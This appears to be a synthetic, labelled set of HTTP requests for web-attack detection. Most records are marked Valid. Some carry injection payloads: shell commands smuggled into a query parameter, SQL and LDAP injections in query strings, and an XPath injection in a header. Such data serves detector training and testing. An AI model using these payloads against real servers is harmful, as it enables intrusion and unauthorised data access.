UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: HTTP/2.8 87.137.87.75, FTP/8.1 182.211.9.179
Transfer-Encoding: identity
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43104
Start - Id: 20566
class: Valid
GET /e5/em9Hhw6EM8D@v/aeay9tt/iohxfugr3wtu/6HJIoySHTlopasswdXZ/rieuAqlnrbcvtnelmane/konxeRT4i5ypEnr3DW.htm?f6FpassthrurQ=qT8nbeCr%3C&onnw9erezrmmn=sm2iTB2AFE&xJahsihTcieogbt=eyes&D8GjeT=eptxuao&aia7a8leh=691935 HTTP/1.1
Host: 104.60.91.172
Connection: keep-alive
Accept: text/xml, image/*, image/*
Accept-Charset: iso-8859-8
Accept-Encoding: identity;q=0.3, compress, gzip, deflate;q=0.8, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 105.61.181.23
Cookie: AWz2w@mocha=9887;Gauyhsri1ttene=0991629;iosvw30Mses4p=903;Gbsselectftp5=8cneua37tvEnasn
Cookie2: $Version="3"
Date: Fri, 18 May 07 01:28:42 CET
ETag: W/"t4Adq4vujXvqzfL3"
Expect: mtonhes1=zfcsie;ntooaoh=yx3hhew
From: kyaidws@Mnhweb0.st
If-Modified-Since: Wed, 20 Apr 05 19:31:54 GMT
If-Unmodified-Since: Wed, 13 Dec 06 03:43:49 GMT
If-Match: "-DF.21GNlTBtuIgEm0"
If-None-Match: "y9XN-SYCDDxashzs"
If-Range: *
Max-Forwards: 71
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic Y2RzaXQzbDE6YXRzZXRveW4=
Authorization: Tm2y 2shDnic4=ftdbos
Range: 852875-5353
Referer: /4Suxlgtr/eolle/heLev24.sh
TE: chunked;q=0.1,gzip,trailers
Trailer: Host
User-Agent: 8Pedpa (tE@E--.P; qI53jw; seYEML)
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7369x544
Via: HTTP/6.6 www.eepns.png, FTP/6.3 231.219.78.100, afen/5.8 www.0bnSa1h.js
Transfer-Encoding: compress
Upgrade: oenMr/2.7, dlt8/0.7, qsRuu/2.7, keAsp/4.8
Warning: 257 13.243.249.249 "3a9dtgni" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20566
Start - Id: 43555
class: OsCommanding
GET /hvGM/aP@BbNvQasL6/1eh/2lh9Ahselrezsq/ERadminVk/fsgeatitnjgra/rVOF8/eOqHUw28mAr/3Pe-5ZIuFdrGdYC9.tiff?6lehAU4seetsku=0eotonpod&tcktxn6oea=onO8Dsv&ntvejctuanhrtsn=%3E&baeriAedihqhBn=+++++%3B++++echo+%3B+++w++%3B+++++uname+++-a+++++%3B+++id&eocoe2eeonto=24aesftbwnp&tbeoiep=ee.Ciz6&edexM2I=senwinntys&a8nln=svleowndlps4euirit&uueh=asrtI HTTP/1.1
Host: www.tnss2e3h6.gov:80
Connection: aewow3ei
Accept: video/quicktime, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n-l97atuen
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: ro2a05tejMk=iR;we2=ya0enAef7awsfSe;me=a1EmNmeestaaS;nn0=33347;dVnEvH54NI8=eoaoeAtsideolmee
Cookie2: $Version="8"
Date: Fri, 05 May 06 14:20:54 GMT
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Sat, 15 Apr 06 20:11:34 UTC
If-Unmodified-Since: Sun, 20 Apr 08 06:36:28 GMT
If-Match: "oFij56X6@Z.zLFCjhY"
If-None-Match: *
If-Range: "eYMO6xAFpavAs1Cnl"
Max-Forwards: 0
MIME-Version: 7.0
Pragma: rAnto=0nFwwre
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: Digest username="eup1n"
Range: 510-
Referer: /nutr/ee3r/b1cNoh3.pl
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: usFhkS2qSD http://www.eaei.gov
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 1.0 www.AntEao.html:48
Transfer-Encoding: gzip
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43555
Start - Id: 7335
class: Valid
PUT /7UpF5H-9gh8b9Sz/ny_CO6XaOwnsNQhHkR/eT3A0PCk1UI5TPQq3c9Q/J7rfIoqselectYgVnIb/eSa6.nsf? HTTP/1.1
Content-Length: 43
Content-Language: sxrd8,7t5uye,negrf
Content-Encoding: compress
Content-Location: /Ehgn.swf
Content-MD5: OG83c2thcnR0cnhhaW5BTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 02:58:23 GMT
Last-Modified: Thu, 10 Jan 08 17:31:25 CET
Host: 185.107.122.165
Connection: close
Accept: text/*;q=0.9, audio/x-wav
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 18.53.58.226
Cookie: 8aairi=dbwx3w4;THS@wGRUX=13;lkmpna8la5ee9an=5048;ei3=Muon elogerm;ngqereetaoitxhs=x7sipassthruD=8m1sxterm1Usts
Cookie2: $Version="02"
Date: Sat, 12 Apr 08 08:37:00 GMT
ETag: W/"x.1@yW8wIjiCNMwf"
Expect: 100-continue
From: sxtr@edeti.de
If-Modified-Since: Tue, 05 Feb 08 19:59:05 UTC
If-Unmodified-Since: Sun, 15 Feb 04 13:33:34 UTC
If-Match: "mburRMODMTYB12UKNi"
If-None-Match: *
If-Range: Wed, 04 Jul 07 11:42:42 CET
Max-Forwards: 2
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM Njllcmh0bmxBbnF0T2RhZWh3anVydGRzM25lZG9zZzZ1U3R0UGVqTm8=
Authorization: hoiei aXug1re=ifch
Range: 4904-,9435-,312-
Referer: http://oheided.uk/4le6t/tewr.avi
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: rnDvos/8.1.4
UA-CPU: 68000
UA-Disp: 068,389,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 203 227.12.172.4 "glfymariontdS0eiet" "Sat, 14 May 05 05:37:02 GMT"
X-Forwarded-For: 109.33.9.119
X-Serial-Number: 0347000130099147
----: ------------------
~~~~~: ~~~~~~~~~~~~

oN6Iartsltond=f0eety;48&chaaohrgytaow=m3x

End - Id: 7335
Start - Id: 35346
class: SqlInjection
GET /727_A/KOg3A@access_log1formYhli/tSLAqRlJx3e00p/ePq@9ybspcwg/piwotnMosmrte/nNwUqZLyzW@U/8u6gyeNE/o@/ikr.mspx?tucdke=9iyrv&hopob=00049&rua2oeu=%3Aaeybccso&emehnu6pteo=azea&reoaomaar4zSNy=%5Cux1vftfi%25a&0liEolu=rLtOPBpm5&noUNoxvep=%5Ce&dnaeneh=t&tadtetvea2niH=%27+++++%2F**%2F++OR+++++%2F**%2F+++++%27Pbm%27++++%3E++++%27S&tlT7ogddAgnsdbn=11584&oenUnyrSRlh41=1636&KBnopen=7776011&nt=%3EpcesctrxrNtoie&xCKYs.1.deleteC=8539737&dropq715Z3z.T=atsenrnhO HTTP/1.1
Host: 138.216.111.191:901
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: iso-10646-ucs-2, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: psrjahdd-eaveio
Cache-Control: min-fresh=24
Client-ip: 166.203.12.145
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="2"
Date: Sat, 24 Apr 10 06:32:59 GMT
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Tue, 06 Jan 09 15:43:18 GMT
If-Unmodified-Since: Sat, 28 May 05 18:50:44 UTC
If-Match: *
If-None-Match: "CsjpdOm.FkF-1bY"
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: emdr 68oa=f1Osdlet
Range: 1609-18413
Referer: http://www.qRs8r5o.cz/2Lnc.tiff
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 5.2; Yh-ti; rv:0.8.6) Gecko/41730125
UA-CPU: 68000
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: 4.0 56.13.232.214
Transfer-Encoding: mders; TbNmenna=aset
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35346
Start - Id: 10526
class: Valid
GET /ri74fCaec/ueq/g-blgnTXK5oypv/g8xhiiwad/ghlcwcpS/sbnvS5Ts4/7ro1nha/oU7bzoeOhbai5pqnf/eVkvX2FBl2P/arr5ooiItbnmp.css?acceptU26.GAzTcJ=529812&3ejlz=573&eTmejaa=holorT4eos&tSQKeiRR=a+4edasmq5ias&el4eadts=77684&ibdndrAewut=nhstl&Z7ausTagzrtl=5pUtEtaelq%27r&too=Iprocessing-instructioni+nd&.ornph-x=3%2Bwcclao+&is2rne7uyueeed=dabadrY+E+a-qaw&noomhdy=5 HTTP/1.0
Host: 202.86.104.191:80
Connection: close
Accept: text/*, audio/*, image/*;q=0.2
Accept-Charset: x-mac-chinesesimp, x-mac-icelandic
Accept-Encoding: 
Accept-Language: 3webu7-GAe
Cache-Control: max-stale
Client-ip: 142.246.81.111
Cookie: 7esjhnrhssle=9477839927
Cookie2: $Version="1"
Date: Mon, 05 Mar 07 17:15:14 CET
ETag: "7lhLX-47Lus4XNxXoNw_"
Expect: 100-continue
From: oteu@5ieOnnk.biz
If-Modified-Since: Sat, 14 Nov 09 19:21:36 GMT
If-Unmodified-Since: Sat, 24 Jan 04 17:02:39 CET
If-Match: *
If-None-Match: *
If-Range: "GCZaDR9i-cX1u4Np7g00"
Max-Forwards: 438
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: NTLM cmVvcmNsdWhlbWVzenBsMmVCNEhvaWVldWxodGxwMnA=
Range: -11352
Referer: /wepiKou/abfaith/ejoauioo/on1peeet.htm
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 0.3; 08-hd; rv:2.0.8) Gecko/72344367
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4657x757
Via: tss/1.1 63.180.186.215:9
Transfer-Encoding: deflate
Upgrade: tl5/3.7, osrmh/0.5, mlszd/1.0, ruai/3.2, hde/0.2
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 7019802753366224
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10526
Start - Id: 29949
class: Valid
GET /nhn4nshaneaicge/9crj.asp? HTTP/1.1
Host: 173.198.237.180
Connection: enoAIcR9
Accept: */*;q=0.5
Accept-Charset: windows-874;q=0.1, isiri-3342, shift_jis;q=0.2
Accept-Encoding: deflate;q=0.5, identity;q=0.4, identity, compress;q=0.7
Accept-Language: cad-tecodiOi
Cache-Control: no-store
Client-ip: 55.119.23.101
Cookie: naon=a1lib])9ornehc[so;tsrhnupt=nullwnull r|dadminndm-aiMtp
Cookie2: $Version="85"
Date: Fri, 30 Dec 05 12:07:36 GMT
ETag: "8774kf4FR_LIAw_W"
Expect: sp9u9b
From: otohir@ybNenoy.com
If-Modified-Since: Thu, 02 Jul 09 08:03:54 CET
If-Unmodified-Since: Wed, 14 Oct 09 09:11:08 UTC
If-Match: "f2-Z8d@Ql8m6v0v"
If-None-Match: *
If-Range: "8eo5wT0I9m3iso-QS"
Max-Forwards: 03
MIME-Version: 1.3
Pragma: ornSo2='heIeeof'
Proxy-Authorization: Basic emZvRUU6bWhkY2k=
Authorization: Digest username="roe8tt"
Range: 054604-5
Referer: /eekhs.shtml
TE: gzip
Trailer: Range
User-Agent: Mozilla/1.3 (Machintosh; U; PPC Mac OS X 0.8; th-yi; rv:0.9.2) Gecko/55388191
UA-CPU: MIPS
UA-Disp: 5197,782,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4455x5564
Via: 4.4 www.ieDete.jpeg:575, FTP/9.6 www.iwtid6th.shtml:905
Transfer-Encoding: deflate
Upgrade: youp/5.6
Warning: 223 www.9aerce.css "ssaeelsoIRoEt2" "Thu, 01 Apr 04 19:48:08 GMT"
X-Forwarded-For: 43.204.198.183
X-Serial-Number: 7694011272
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29949
Start - Id: 11473
class: Valid
GET /0tybpv7/rXk43EvF665UR3aShKJ/em44E/ejzemCr/yEasaw7cAe/nrvk/aiyle3nto8nFruog.shtml?eelo=3&rzedtzdma1a=stoll&f4adO=iorwMehlcoiama5&ecatnarbnitrLuM=22&tndtc=650128&kaOTittnustR=70446802&EUmr=2931843&imH=sqe8isn HTTP/1.1
Host: www.woes1epst.be:434
Connection: close
Accept: image/*, image/*;q=0.4
Accept-Charset: euc-cn;q=0.4, windows-1254;q=0.1
Accept-Encoding: deflate;q=0.3, gzip;q=0.8
Accept-Language: *
Cache-Control: max-age=29433
Client-ip: 202.103.58.163
Cookie: aeAnidS= 0deKmf;Bn4IBlinkk0e=tkgn03qt1I2;sml=9331089
Cookie2: $Version="15"
Date: Tue, 30 Mar 10 19:39:02 UTC
ETag: W/"uok78NCd1DvlIieuna"
Expect: 100-continue
From: oohw@halud.org
If-Modified-Since: Sun, 15 Feb 04 04:05:10 CET
If-Unmodified-Since: Thu, 16 Jul 09 12:39:11 UTC
If-Match: "u8euFD606SHUFRq_ea_"
If-None-Match: "tCx4EYny-T2y59bHZ"
If-Range: *
Max-Forwards: 62
MIME-Version: 2.9
Pragma: oo9=uw7nzAr
Proxy-Authorization: otl1hQ 7eaee=ntgy
Authorization: Basic ZWVuZDpQbnJnbw==
Range: 1697-
Referer: /rerq.css
TE: trailers
Trailer: From
User-Agent: tt5n90e0e (iQzxOt; eZJfX.)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9366x217
Via: feiA/5.0 www.tadpc.tiff, 0.7 www.stHlc.png, tcwas/9.8 www.ispghsf.js
Transfer-Encoding: identity
Upgrade: au1/2.1, OghB/7.4, cgcvbt/8.8, aewhh/9.8
Warning: 532 www.guwhhej.jpeg "fEoeeynUyaan2" "Sat, 12 Apr 08 24:22:20 UTC"
X-Forwarded-For: 54.109.53.253
X-Serial-Number: 684447475496
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11473
Start - Id: 35899
class: XPathInjection
POST /a8mr4wC-VvILj/aei11ornfkecEt/ed8tEthn7l/sodd/hAEDslSLlyJksokB/F%usKrph61/lr.css? HTTP/1.0
Content-Length: 236
Content-Language: rhusn
Content-Encoding: compress
Content-Location: /eds4/i9dikuia/elTemem.js
Content-MD5: dHBpOWlxZWF4bmlwYWF0Ug==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Jun 04 15:57:42 UTC
Last-Modified: Sun, 06 Sep 09 07:58:55 CET
Host: www.9jhxkame.gov:80
Connection: rSt2eh2s
Accept: text/xml
Accept-Charset: iso-2022-kr, koi8, shift_jis, us-ascii;q=0.4, euc-cn;q=0.2
Accept-Encoding: 0  or  count(path/child::node()[position()=((i+j+k+l+1)]   |  path/child::*()[position()=(k+1)])=1    or 2743=
Accept-Language: seiq-wp, wtt-enehl;q=0.0, n-o;q=0.4, e-rE19;q=0.9, lahN-umom
Cache-Control: no-cache
Cookie2: $Version="1"
Date: Sat, 30 Jul 05 13:02:23 CET
ETag: W/"0MssCVm6DoOe2_0sNW8"
If-Modified-Since: Mon, 13 Apr 09 10:01:17 GMT
If-Match: *
If-None-Match: "IGLZuYRpTBZMhMTc"
If-Range: *
Max-Forwards: 27
Authorization: ijboIo tOaa=tbEpaaks
Referer: /nid69erC/e5et3nio/5odtleeb/Tocc.tiff
TE: chunked;q=0.8
User-Agent: 4GPaHLkAq http://www.nigea2.org
Via: FTP/6.6 128.117.51.228:12, HTTP/8.6 www.tort.tiff, 3.4 3.230.39.138
Transfer-Encoding: deflate
Warning: 185 95.174.113.134 "rtofrih1yr" "Tue, 17 Jul 07 19:10:56 GMT"

Vzuh4autoexecAonmocha0=NdtndsobmHgn66s&eoe='he&lwielyhto=t&Eth6o=12219805&et8p7OatRcecl=5418&zxp_vyrcpzIMrmEL=a sun&Ebth=iapSibcsu&jkrqmmnedoae=3982&eval74P=9933&Op_0Dr5gI.Q=tvu2bgPe1(n&Eluxsznomnm=oeod2:vs=e&oe1etasicgpt=242692

End - Id: 35899
Start - Id: 22858
class: Valid
GET /KlKyH.tiff?R4metakIM=862&esnen1ss=257&be0=7%3Acxefe&rwMehwawsat0=oe HTTP/1.1
Host: 250.72.199.102:80
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: p8e-ts, rA2k37-mwo, be-h0A, f-eRsewu;q=0.6, iHz-cing;q=0.6
Cache-Control: no-store
Client-ip: 76.193.28.123
Cookie: mpriiAshuz=33
Cookie2: $Version="7"
Date: Sat, 02 Jun 07 12:55:13 UTC
ETag: "PLI4_Oic2ig7dd6"
Expect: 100-continue
From: tooo@iHal.net
If-Modified-Since: Sun, 30 Aug 09 07:44:16 GMT
If-Unmodified-Since: Wed, 05 May 10 18:45:06 GMT
If-Match: "-AYp2_iCKqTAcWHos75U"
If-None-Match: "HoOI6mVbzjy99tKLw"
If-Range: Tue, 25 Oct 05 02:32:27 UTC
Max-Forwards: 098
MIME-Version: 5.6
Pragma: Snlooo='tp'
Proxy-Authorization: NTLM YXNucmlkZW5uaXJuaGNzcGVuZHM5c29zZW1ycmVlZXVpb2RJck5hdHU1cjJpRQ==
Authorization: dtRrb ops2oeo9=frn8DyN
Range: -0889
Referer: /r2era/forgi/iChyu.pdf
TE: trailers,chunked
Trailer: If-Match
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 4.7; xi-ti; rv:8.5.2) Gecko/30016476
UA-CPU: MIPS
UA-Disp: 1043,278,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
Via: 7.2 99.185.165.60, HTTP/3.2 121.80.181.55, 7.7 www.2eydt.shtml
Transfer-Encoding: gzip
Upgrade: teren/4.5, thrR/0.6
Warning: 668 228.131.167.200 "ao6nqs3ddrpssEhssnrm" 
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 22858
Start - Id: 25171
class: Valid
GET /sZZSdwbDPQN/_gcJwLQPO/tu6buro7yh26h.bin? HTTP/1.1
Host: 233.36.142.138
Connection: keep-alive
Accept: text/*;q=0.8, application/*;q=0.6, video/mpeg
Accept-Charset: euc-tw, x-mac-chinesetrad;q=0.9, iso-8859-1
Accept-Encoding: identity, identity, compress
Accept-Language: ee-rz, reuahnco-1oswtb9, t-sr
Cache-Control: no-cache
Client-ip: 56.216.77.220
Cookie: rnnofTlbne5=an;rArAedacioisb=edp%uttmp'siy1aisystem;hHPomyiale42ti=74rnspa
Cookie2: $Version="8"
Date: Thu, 23 Feb 06 13:17:12 CET
ETag: W/"hAqlYd2Sq6tOVY8lO"
Expect: 100-continue
From: t6e6@olsywdnTj.it
If-Modified-Since: Wed, 07 Apr 04 17:01:42 GMT
If-Unmodified-Since: Mon, 23 Feb 04 17:24:07 UTC
If-Match: "IJfig.IfiCGBGo5S"
If-None-Match: *
If-Range: Mon, 10 Oct 05 11:30:28 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: 9eeo thzsm=tpkn
Range: 0550-
Referer: /brlena/srmder/rnowdt.fgf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: iolnramtyzpmh
UA-CPU: Sparc
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: FTP/3.4 117.224.122.11, steoo/7.4 www.enbi.jpeg:7833
Transfer-Encoding: identity
Upgrade: tIis/4.6
Warning: 814 www.tanns.gif "7et8naWmlnMpa" 
X-Forwarded-For: 54.93.72.103
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25171
Start - Id: 86
class: Valid
GET /aowclajoEeyicw/hLtMAusFa9o0y/esC/iesR/hNulCS2dsQjKIFE3/wnOLcItmSr@/nora4rDodknoeeio/gl/sr6l_n/wee7b/vhX@duvTd79.tiff?hosarojaile=tzg&nshcr=74&Oiiaerh=h71x0&ulmtr=Nh2%3B+%27dti HTTP/1.0
Host: www.4wNs7sta.net
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1253
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 44.224.78.118
Cookie: s8x4e= eonps;e3ise3w9g=e?ihaty o;tnthcrmxskety=szmi%;oiljiD=959570;aRlHhdo6=mw
Cookie2: $Version="49"
Date: Tue, 10 Feb 04 21:28:37 GMT
ETag: W/"AShFJJomkmXUQfFrlj."
Expect: 100-continue
From: eislseer@gopa.fr
If-Modified-Since: Sun, 02 Dec 07 17:49:41 GMT
If-Unmodified-Since: Fri, 01 Feb 08 04:45:16 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM bG5vaUllYmNmYWh0ZWkyd2F0ZHNkdWNudUFlc3NybGVpZmlucw==
Authorization: Basic SXRpYnZteXc6aEV1dg==
Range: 41396-563,553741-
Referer: /osquohdo/Olqu/f1gosfek/ihanoi.swf
TE: chunked;q=0.8
Trailer: Date
User-Agent: s5iiYU
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: 8.0 99.175.90.173
Transfer-Encoding: mopos
Upgrade: plohnd/1.0
Warning: 842 199.4.175.100 "ee1nrfsC0saOb" "Tue, 12 Feb 08 10:26:21 CET"
X-Forwarded-For: 12.218.76.45
X-Serial-Number: 9033271704641075484
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 86
Start - Id: 20507
class: Valid
GET /xeUeeh/bfLS54gRycN8/eiAi/a7vZtCPx/eeRsSudtto7/xaieflyknGue.php?IaFAil2Qimg=pum9C&decatlae7r=%24+5%5Dnph-memoojlhttpsie HTTP/1.1
Host: 117.29.103.127
Connection: keep-alive
Accept: video/*;q=0.3
Accept-Charset: ks_c_5601-1987, euc-cn;q=0.2, x-mac-cyrillic;q=0.5, x-mac-greek;q=0.6
Accept-Encoding: *
Accept-Language: eo0o6aet-rzut;q=0.6, 6eAdnd-8e, euht-l5bs, ttnE-d;q=0.0, alhmei-7xnjlo;q=0.2
Cache-Control: max-stale
Client-ip: 84.84.100.25
Cookie: Ailelo5aeeb=x;hzeaO5=505777;msy=rz59PHhentgjwR;swsRan1=322644;dfetVrEs9oao=trr;ea=p9eIsttaZVaa
Cookie2: $Version="20"
Date: Tue, 11 Oct 05 07:44:35 CET
ETag: W/"REogFZtBveGVsPzJt4"
Expect: 100-continue
From: ttui@snpa.it
If-Modified-Since: Fri, 17 Feb 06 05:14:23 UTC
If-Unmodified-Since: Tue, 07 Aug 07 01:37:27 GMT
If-Match: "--ngB44z_ya@HDZfBng"
If-None-Match: *
If-Range: "AKuWP9KlwYj..yhN"
Max-Forwards: 8481
MIME-Version: 6.1
Pragma: aelra=Fye
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Digest algorithm=MD5-sess
Range: 4491-065001,286085-641,-713
Referer: /ahRatc/irheeomN/oEoClOx/yebtslxh/eugnUn.swf
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.6 (compatible; MSIE 8.4; Solaris; naSdsi)
UA-CPU: MIPS
UA-Disp: 027,9138,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1448x0592
Via: FTP/0.3 www.vebr.tiff:31, 3.2 132.47.109.114:33, 0.6 210.24.24.140
Transfer-Encoding: liidtk; aeht2=xcoea
Upgrade: me9/6.2, nno/3.7, hbz6km/5.5
Warning: 358 31.230.86.11 "lxeoteiukr" "Sun, 20 Feb 05 06:39:18 GMT"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 169658990624449042
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20507
Start - Id: 9671
class: Valid
GET /r6h--C-mpa/tuhoha1braDf.htm?lemEnlheilK=ndiac&nuss=nu%5Do+&_ZJPgu8MlinklIX=od&iSw3=aM-QY3&ehlef8eHca9td=sjceiii8qsnO%28&Arp=hiedem&ent4=dO%3Deeanid%5DSutOinputb+d&acbedejntsew=brfsororigTE9&SsNK2yJ.T2log=%246iwp-of6oaeooerr&dfiml152oI=4the%7C%5Cnt61n HTTP/1.0
Host: www.pHcg3fiat.net
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6700
Client-ip: 54.218.0.196
Cookie: kh=l0A;gao=%vs4sA;mrionnresoiev=oes;rahrJaqm6stMaIr=4622;c9Ktr=7rteedsvy9
Cookie2: $Version="970"
Date: Fri, 16 Feb 07 09:14:15 CET
ETag: "eM@cw-0nb.87aheL"
Expect: 100-continue
From: sdeFe@thwrtMf2.com
If-Modified-Since: Sat, 20 May 06 18:38:36 CET
If-Unmodified-Since: Fri, 11 Feb 05 16:17:49 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Nov 05 06:49:10 GMT
Max-Forwards: 20
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM bXk1bm1taGV0cmFtaGluMUlubmlxYnBic3l3OXVFdHVzeW50aXlpc29hdHllZUlt
Authorization: C7yakw tcsulw=srrif
Range: 7-
Referer: http://6sxhwA.gov/8adhn/jeeet3x/eerp/sfRythj7/8sEsea4N.conf
TE: gzip
Trailer: Date
User-Agent: qtdisei/0.2.5.1
UA-CPU: x86
UA-Disp: 1994,401,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7210x634
Via: 1.6 23.238.183.253
Transfer-Encoding: baitMe; l8ap=ndae
Upgrade: era/6.9
Warning: 821 www.f4tipnoj.jpeg:21799 "pyfo4" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 048488269920
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9671
Start - Id: 38197
class: LdapInjection
GET /bniyn4raegdiinsic/ctmetagroup byftpBstyle5z7rdl/aIz-cb.kVq9Odb2X7C/aWKR.cfm?i_U.7wE=%29+%28%7C+++%28displayName%3Dhad*%29++%28name++%3D+had*+++%29%28mail%3Dhad*++%29&uLE6=35&E9zttr=9lglmcqy0ayFntn HTTP/1.1
Host: www.Jctedqck5.st
Connection: close
Accept: video/quicktime;q=0.7, video/*;q=0.4, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=42627
Client-ip: 9.211.101.123
Cookie: sCv@-9YjRM-=i6henpeelahNoarac;ih=303
Cookie2: $Version="97"
Date: Mon, 12 May 08 13:50:01 UTC
ETag: W/"JiAtFW0tg5S.p1q"
Expect: 100-continue
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 25 Jan 05 14:43:53 CET
If-Unmodified-Since: Tue, 24 Jun 08 19:47:23 CET
If-Match: "Gq947FVIKEpTIdISdE6V"
If-None-Match: "xRfhsU1GvSSfCM_YUjT"
If-Range: Tue, 31 May 05 23:12:01 GMT
Max-Forwards: 057
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: hmtuel fet4=hcsyo
Range: -49,281-
